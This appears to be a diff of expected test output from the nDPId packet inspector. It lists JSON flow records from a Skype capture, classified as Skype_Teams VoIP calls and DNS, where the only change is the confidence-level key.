-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748262,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
